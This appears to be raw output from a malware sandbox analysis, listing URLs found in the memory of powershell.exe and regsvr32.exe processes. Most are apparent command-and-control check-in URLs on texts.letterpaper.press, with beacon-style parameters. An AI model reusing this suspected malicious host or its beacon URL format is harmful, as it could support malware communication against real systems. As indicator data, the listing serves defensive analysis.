Source: powershell.exe, 00000004.00000002.454312297.0000022E38F9E000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.519223308.000001ACA52BD000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69% |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694 |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695 |
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69; |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C |
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G |
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M |
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i |
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k |
Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69o |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm |
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q |
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69u |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190 |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190% |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190& |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902 |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902M) |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11906 |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190? |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190B |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190I |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190J |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K8( |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190KP7 |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190N |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190SL |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190V |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b$( |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b7 |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK6( |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db;M |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5 |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbXM |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190k |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190p2=c |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190sMh |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w(: |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190z |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190 |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190# |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190#~ |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190$ |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190&M |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190(z |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)M |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)t |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190-( |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190. |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190/ |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11901t |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11903 |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace119037 |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904 |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904&2qt |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904N |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905C |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905t |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11906L |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11907 |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11909 |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190; |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=N |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=t |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190? |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190?L |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190A( |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AC |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AL: |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190B |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190C |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190D |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190EC |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Et |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190F |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190FN |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G~ |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190H |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190HN |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190It |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190I~ |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190J |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K/M |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K0 |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K7 |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Kz |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190LM |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190MC |
Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Mt |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190N |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O$ |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O- |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190P |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190PO |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Q |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190QN |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190R |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190S |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190SL |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190T |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190UM |
Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190V |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190W |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Y |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190YC |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190_M |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b( |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bCM |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bJ( |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK:M |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bKy( |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bO |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bc |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5 |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bn(# |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bt75 |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190c |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190csi |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db;M |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190d~ |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190e |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190f-1 |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190fb |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190g |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190gM |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190h |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iC& |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190iM |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190l |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lN/ |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lO) |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190m |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190mC |
